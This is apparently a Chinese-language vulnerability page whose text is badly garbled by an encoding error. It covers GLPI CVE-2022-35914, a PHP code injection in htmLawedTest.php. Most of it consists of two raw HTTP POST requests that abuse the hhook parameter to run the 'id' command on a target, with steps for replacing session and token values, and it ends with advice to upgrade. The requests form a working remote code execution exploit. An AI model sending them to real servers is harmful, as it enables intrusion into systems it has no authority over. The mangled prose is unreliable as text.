GLPIÊǸöÈË¿ª·¢ÕßµÄÒ»¿î¿ªÔ´ITºÍ×ʲú¹ÜÀíÈí¼þ¡£¸ÃÈí¼þÌṩ¹¦ÄÜÈ«ÃæµÄIT×ÊÔ´¹ÜÀí½Ó¿Ú£¬¿ÉÒÔÓÃËüÀ´½¨Á¢Êý¾Ý¿âÈ«Ãæ¹ÜÀíITµÄµçÄÔ£¬ÏÔʾÆ÷£¬·þÎñÆ÷£¬´òÓ¡»ú£¬ÍøÂçÉ豸£¬µç»°£¬ÉõÖÁÎø¹ÄºÍÄ«ºÐµÈ¡£
GLPI 10.0.2¼°Ö®Ç°°æ±¾´æÔڻƽð³Ç¹ÙÍøÂ©¶´£¬¸Ã©¶´Ô´ÓÚhtmlawed Ä£¿éÖÐµÄ /vendor/htmlawed/htmlawed/htmLawedTest.php ÔÊÐí PHP ´úÂë×¢È롣©¶´±àºÅ£ºCVE-2022-35914£¬Â©¶´µÈ¼¶£º¸ßΣ¡£
GLPI 10.0.2¼°Ö®Ç°°æ±¾
fofaËÑË÷Óï·¨£º

ʹÓÃBurpsuite¹¤¾ß×¥°ü£¬Ö´ÐÐÈçÏÂPOC»ñÈ¡tokenºÍsidµÄÖµ¡£
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=d531j7fek8t6v3d0d0jpk558q5Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=£å£ø£å£ã&sid=d531j7fek8t6v3d0d0jpk558q5
½«sidÔÚcookieÍ·ºÍPOSTÊý¾Ý°ütoken²ÎÊýÖÐÌæ»»£¬½«tokenÔÚPOSTÊý¾Ý°ütoken²ÎÊýÖÐÌæ»»£¬£å£ø£å£ãÖ´ÐÐidÃüÁµÃµ½»ØÏÔ¡£
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=53lec8gbd0dvh64k0ikst1d0riUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
token=94dd0c78fff81fb34a491754631e8ee7&text=id&hhook=£å£ø£å£ã&sid=53lec8gbd0dvh64k0ikst1d0ri

¸ù¾Ý¹Ù·½ÎĵµÉý¼¶ÖÁ×îа汾¡£